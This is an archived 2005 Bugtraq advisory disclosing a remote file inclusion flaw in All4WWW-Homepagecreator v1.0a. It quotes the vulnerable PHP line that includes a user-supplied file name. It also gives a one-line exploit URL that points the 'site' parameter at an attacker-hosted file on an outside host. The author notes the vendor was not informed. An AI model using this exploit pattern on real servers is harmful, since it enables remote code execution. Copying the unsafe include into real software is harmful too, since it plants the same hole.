[38367] in bugtraq

home help back first fref pref prev next nref lref last post

All4WWW-Homepagecreator Remote Command Execution

daemon@ATHENA.MIT.EDU (Francisco Alisson)
Thu Apr 14 14:45:09 2005

Date: 14 Apr 2005 03:21:42 -0000
Message-ID: <20050414032142.27171.qmail@www.securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
From: Francisco Alisson <dominusvis@click21.com.br>
To: bugtraq@securityfocus.com



################################################
#
#  Script: All4WWW-Homepagecreator
#  Version: v1.0a
#  Vendor: http://www.All4WWW.com
#
################################################

I. Bug Code
On index.php

...
if(!$site) {$site="home";}
include "$site.dat";
...


II. Exploit
[vuln-host]/index.php?site=http://[host]/some-file

PS.: The vendor wasn't inform.

############################################
#           by Dominus_Vis
#          [Infektion Group]
############################################

home help back first fref pref prev next nref lref last post